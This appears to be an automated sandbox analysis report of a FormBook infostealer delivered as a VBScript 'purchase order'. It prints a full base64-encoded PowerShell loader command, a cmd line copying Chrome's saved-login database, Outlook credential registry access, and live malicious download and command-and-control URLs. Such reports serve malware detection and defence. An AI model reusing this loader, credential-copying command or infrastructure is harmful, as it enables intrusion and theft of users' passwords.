Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBMAEEAQwBUAEkARgBFAFIATwAgAGIAcgBlAGcAbwAgAEsAbgBvAGIAZQB0AHMAZgByAGkAOQAgAEgAZQBzAHQAMwAgAEcAcgB1AGUAcwBvAG0ANAAgAEcAZQBuAGUAcgBhAGwAaQBzACAAQQBGAE0ARQBKACAAYgBlAGEAdgBlAHIAIABCAEkAQgBMAEkATwBHAFIAIABEAGQAbQBhAG4AZABzAGsAbgA1ACAAbgB1AGwAbABpAG4AIABsAG4AcABvAHQAcwB5AHMAdABlACAAVABoAHIAZQBhAHAAZQBkAGEAZgAgAE8AdQB0AHcAcgBlAHMAIABHAFQARQBWAEkAVgAgAFUAbgBzAGgAYQBjAGsAbABpADgAIABjAG8AcgByAGUAIABMAEEAUgBNAEUATgBTAEYAIABEAGkAcwB0AGkAbgBnAHYAOAAgAGQAaQBzAGUAbQBiAG8AIABIAFkAUABFACAAVQBuAGYAaQBsADkAIABWAEEATgBEAEIAUgBOAEQAQQAgAEcAZQBuAG4AZQAgAEIAZQBtAGUAcwB0AHIAZQA0ACAAaQBuAGQAcABhACAAQgBpAHQAcwB5AGwAZQAgAFQAZQByAG4AYQBzAGgAZQAgAEsAbwBrAGEAcgBkACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABiAHIAbgBlAGMAeQBrAGwAMQANAAoAewANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbgB0AGQAbABsAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABOAHQAQQBsAGwAbwBjAGEAdABlAFYAaQByAHQAdQBhAGwATQBlAG0AbwByAHkAKABpAG4AdAAgAGIAcgBuAGUAYwB5AGsAbAA2ACwAcgBlAGYAIABJAG4AdAAzADIAIAByAGUAcwB0AGIAZQBsAGIALABpAG4AdAAgAEQAeQBiAGIANgAsAHIAZQBmACAASQBuAHQAMwAyACAAYgByAG4AZQBjAHkAawBsACwAaQBuAHQAIABhAHAAcABsAGkAZQAsAGkAbgB0ACAAYgByAG4AZQBjAHkAawBsADcAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAEYAaQBsAGUAQQAoAHMAdAByAGkAbgBnACAAaQBtAG0AYQBuACwAdQBpAG4AdAAgAEgAeQBwAG8AZwB5AG4AeQBiACwAaQBuAHQAIABEAGkAcwBjAGkAcABsADMALABpAG4AdAAgAGIAcgBuAGUAYwB5AGsAbAAwACwAaQBuAHQAIABQAGUAdAB1AG4AaQBlAHIAbgAsAGkAbgB0ACAARwByAHUAbgBnAGUAcwBtAGkAdAAsAGkAbgB0ACAARABlAG0AbwByAGEAbAA1ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABSAGUAYQBkAEYAaQBsAGUAKABpAG4AdAAgAEQAeQBiAGIANgAwACwAdQBpAG4AdAAgAEQAeQBiAGIANgAxACwASQBuAHQAUAB0AHIAIABEAHkAYgBiADYAMgAsAHIAZQBmACAASQBuAHQAMwAyACAARAB5AGIAYgA2ADMALABpAG4AdAAgAEQAeQBiAGIANgA0ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgASQBuAHQAUAB0AHIAIABEAHkAYgBiADYANQAsAGkAbgB0ACAARAB5AGIAYgA2ADYALABpAG4AdAAgAEQAeQBiAGIANgA3ACwAaQBuAHQAIABEAHkAYgBiADYAOAAsAGkAbgB0ACAARAB5AGIAYgA2ADkAKQA7AA0ACgB9AA0ACgAiAEAADQAKACMAQgBpAHMAYQBtAHMAYwBoAHUAIABEAG8AdgBlAG4AOAAgAEMAYQBsAHkAIABLAHUAbABkAGkAbwB4AGkAZAAgAGcAcgBhAGYAaQBrAHIAdQB0AGkAIABMAGsAawBlAHIAbgAgAEsAYQBuAG8AbgBpADkAIABDAGgAZQBsADkAIABlAG4AZABlAGIAYQBsAGwAZQBuACAAZABpAHMAawAgAFQAYQBkAGUAYQB3AG8AdQBjADQAIABVAGkAdABvAHQAYQBuAHUAZAA4ACAAQwB1AHQAbABhAHMAcwBmADQAI Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBMAEEAQwBUAEkARgBFAFIATwAgAGIAcgBlAGcAbwAgAEsAbgBvAGIAZQB0AHMAZgByAGkAOQAgAEgAZQBzAHQAMwAgAEcAcgB1AGUAcwBvAG0ANAAgAEcAZQBuAGUAcgBhAGwAaQBzACAAQQBGAE0ARQBKACAAYgBlAGEAdgBlAHIAIABCAEkAQgBMAEkATwBHAFIAIABEAGQAbQBhAG4AZABzAGsAbgA1ACAAbgB1AGwAbABpAG4AIABsAG4AcABvAHQAcwB5AHMAdABlACAAVABoAHIAZQBhAHAAZQBkAGEAZgAgAE8AdQB0AHcAcgBlAHMAIABHAFQARQBWAEkAVgAgAFUAbgBzAGgAYQBjAGsAbABpADgAIABjAG8AcgByAGUAIABMAEEAUgBNAEUATgBTAEYAIABEAGkAcwB0AGkAbgBnAHYAOAAgAGQAaQBzAGUAbQBiAG8AIABIAFkAUABFACAAVQBuAGYAaQBsADkAIABWAEEATgBEAEIAUgBOAEQAQQAgAEcAZQBuAG4AZQAgAEIAZQBtAGUAcwB0AHIAZQA0ACAAaQBuAGQAcABhACAAQgBpAHQAcwB5AGwAZQAgAFQAZQByAG4AYQBzAGgAZQAgAEsAbwBrAGEAcgBkACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABiAHIAbgBlAGMAeQBrAGwAMQANAAoAewANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbgB0AGQAbABsAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABOAHQAQQBsAGwAbwBjAGEAdABlAFYAaQByAHQAdQBhAGwATQBlAG0AbwByAHkAKABpAG4AdAAgAGIAcgBuAGUAYwB5AGsAbAA2ACwAcgBlAGYAIABJAG4AdAAzADIAIAByAGUAcwB0AGIAZQBsAGIALABpAG4AdAAgAEQAeQBiAGIANgAsAHIAZQBmACAASQBuAHQAMwAyACAAYgByAG4AZQBjAHkAawBsACwAaQBuAHQAIABhAHAAcABsAGkAZQAsAGkAbgB0ACAAYgByAG4AZQBjAHkAawBsADcAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAEYAaQBsAGUAQQAoAHMAdAByAGkAbgBnACAAaQBtAG0AYQBuACwAdQBpAG4AdAAgAEgAeQBwAG8AZwB5AG4AeQBiACwAaQBuAHQAIABEAGkAcwBjAGkAcABsADMALABpAG4AdAAgAGIAcgBuAGUAYwB5AGsAbAAwACwAaQBuAHQAIABQAGUAdAB1AG4AaQBlAHIAbgAsAGkAbgB0ACAARwByAHUAbgBnAGUAcwBtAGkAdAAsAGkAbgB0ACAARABlAG0AbwByAGEAbAA1ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABSAGUAYQBkAEYAaQBsAGUAKABpAG4AdAAgAEQAeQBiAGIANgAwACwAdQBpAG4AdAAgAEQAeQBiAGIANgAxACwASQBuAHQAUAB0AHIAIABEAHkAYgBiADYAMgAsAHIAZQBmACAASQBuAHQAMwAyACAARAB5AGIAYgA2ADMALABpAG4AdAAgAEQAeQBiAGIANgA0ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgASQBuAHQAUAB0AHIAIABEAHkAYgBiADYANQAsAGkAbgB0ACAARAB5AGIAYgA2ADYALABpAG4AdAAgAEQAeQBiAGIANgA3ACwAaQBuAHQAIABEAHkAYgBiADYAOAAsAGkAbgB0ACAARAB5AGIAYgA2ADkAKQA7AA0ACgB9AA0ACgAiAEAADQAKACMAQgBpAHMAYQBtAHMAYwBoAHUAIABEAG8AdgBlAG4AOAAgAEMAYQBsAHkAIABLAHUAbABkAGkAbwB4AGkAZAAgAGcAcgBhAGYAaQBrAHIAdQB0AGkAIABMAGsAawBlAHIAbgAgAEsAYQBuAG8AbgBpADkAIABDAGgAZQBsADkAIABlAG4AZABlAGIAYQBsAGwAZQBuACAAZABpAHMAawAgAFQAYQBkAGUAYQB3AG8AdQBjADQAIABVAGkAdABvAHQAYQBuAHUAZAA4ACAAQwB1AHQAbABhAHMAcwBmADQAI Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vsdke30k\vsdke30k.cmdline Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6913.tmp" "c:\Users\user\AppData\Local\Temp\vsdke30k\CSC2B92EBAA3FFD4AC6819286896BCEF79.TMP" Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V Jump to behavior
Source: explorer.exe, 00000015.00000000.1015394640.0000000000AD8000.00000004.00000020.sdmp, explorer.exe, 00000015.00000000.1088990899.0000000000AD8000.00000004.00000020.sdmp, explorer.exe, 00000015.00000000.999045457.0000000000AD8000.00000004.00000020.sdmp Binary or memory string: ProgmanMD6
Source: explorer.exe, 00000015.00000000.1016434591.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000015.00000000.999323407.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000015.00000000.1036946610.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000015.00000000.1089342683.0000000001080000.00000002.00020000.sdmp Binary or memory string: Program Manager
Source: explorer.exe, 00000015.00000000.1016434591.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000015.00000000.1040185049.0000000005E50000.00000004.00000001.sdmp, explorer.exe, 00000015.00000000.999323407.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000015.00000000.1036946610.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000015.00000000.1089342683.0000000001080000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000015.00000000.1016434591.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000015.00000000.999323407.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000015.00000000.1036946610.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000015.00000000.1089342683.0000000001080000.00000002.00020000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000015.00000000.1016434591.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000015.00000000.999323407.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000015.00000000.1036946610.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000015.00000000.1089342683.0000000001080000.00000002.00020000.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 00000015.00000000.1043806795.000000000A716000.00000004.00000001.sdmp, explorer.exe, 00000015.00000000.1006326818.000000000A716000.00000004.00000001.sdmp Binary or memory string: Shell_TrayWnd5D

Language, Device and Operating System Detection
barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected FormBook
Source: Yara match File source: 00000016.00000002.1182719160.0000000002970000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.1065437367.000000001E680000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000000.1041249654.00000000068E8000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.1181818454.00000000006C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.1182689732.0000000002940000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.1060812859.0000000002770000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000000.1025559293.00000000068E8000.00000040.00020000.sdmp, type: MEMORY
Tries to steal Mail credentials (via file / registry access)
Source: C:\Windows\SysWOW64\svchost.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe File opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data Jump to behavior

Remote Access Functionality
barindex
Yara detected FormBook
Source: Yara match File source: 00000016.00000002.1182719160.0000000002970000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.1065437367.000000001E680000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000000.1041249654.00000000068E8000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.1181818454.00000000006C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.1182689732.0000000002940000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.1060812859.0000000002770000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000000.1025559293.00000000068E8000.00000040.00020000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 557838 Sample: New _Inquiry P.O4622.vbs Startdate: 21/01/2022 Architecture: WINDOWS Score: 100 59 Found malware configuration 2->59 61 Malicious sample detected (through community Yara rule) 2->61 63 Antivirus detection for URL or domain 2->63 65 12 other signatures 2->65 11 wscript.exe 2 2->11         started        process3 signatures4 77 VBScript performs obfuscated calls to suspicious functions 11->77 79 Wscript starts Powershell (via cmd or directly) 11->79 81 Very long command line found 11->81 83 Encrypted powershell cmdline option found 11->83 14 powershell.exe 25 11->14         started        process5 signatures6 87 Tries to detect Any.run 14->87 89 Hides threads from debuggers 14->89 17 ieinstal.exe 6 14->17         started        21 csc.exe 3 14->21         started        24 conhost.exe 14->24         started        process7 dnsIp8 47 owanlab.com 157.7.107.166, 443, 49823 INTERQGMOInternetIncJP Japan 17->47 67 Modifies the context of a thread in another process (thread injection) 17->67 69 Tries to detect Any.run 17->69 71 Maps a DLL or memory area into another process 17->71 73 3 other signatures 17->73 26 explorer.exe 17->26 injected 45 C:\Users\user\AppData\Local\...\vsdke30k.dll, PE32 21->45 dropped 30 cvtres.exe 1 21->30         started        file9 signatures10 process11 dnsIp12 49 www.ordemt.com 26->49 85 System process connects to network (likely due to code injection or exploit) 26->85 32 svchost.exe 1 18 26->32         started        signatures13 process14 file15 41 C:\Users\user\AppData\...\LQMlogrv.ini, data 32->41 dropped 43 C:\Users\user\AppData\...\LQMlogri.ini, data 32->43 dropped 51 Detected FormBook malware 32->51 53 Creates an undocumented autostart registry key 32->53 55 Tries to steal Mail credentials (via file / registry access) 32->55 57 4 other signatures 32->57 36 cmd.exe 2 32->36         started        signatures16 process17 signatures18 75 Tries to harvest and steal browser information (history, passwords, etc) 36->75 39 conhost.exe 36->39         started        process19
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
157.7.107.166
 owanlab.com Japan 7506 INTERQGMOInternetIncJP true

Contacted Domains

Name IP Active
owanlab.com 157.7.107.166 true
www.ordemt.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
www.usyeslogistics.com/k6sm/ true
  • Avira URL Cloud: safe
 low
https://owanlab.com/bin_DziiNe252.bin true
  • Avira URL Cloud: malware
 unknown